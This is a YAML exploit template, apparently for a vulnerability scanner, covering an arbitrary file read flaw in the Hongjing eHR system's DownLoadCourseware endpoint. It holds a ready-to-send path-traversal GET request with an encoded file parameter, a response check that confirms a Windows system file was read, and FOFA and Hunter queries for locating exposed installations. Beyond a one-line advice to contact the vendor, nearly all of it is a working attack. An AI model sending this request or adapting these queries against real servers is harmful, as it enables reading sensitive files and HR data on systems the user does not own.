product: 宏景eHR人力资源信息管理系统
vName: 宏景eHR DownLoadCourseware接口任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 宏景eHR /w_selfservice/oauthservlet/%2e./.%2e/DownLoadCourseware存在任意文件读取
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/140180110
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /w_selfservice/oauthservlet/%2e./.%2e/DownLoadCourseware?url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: 'and'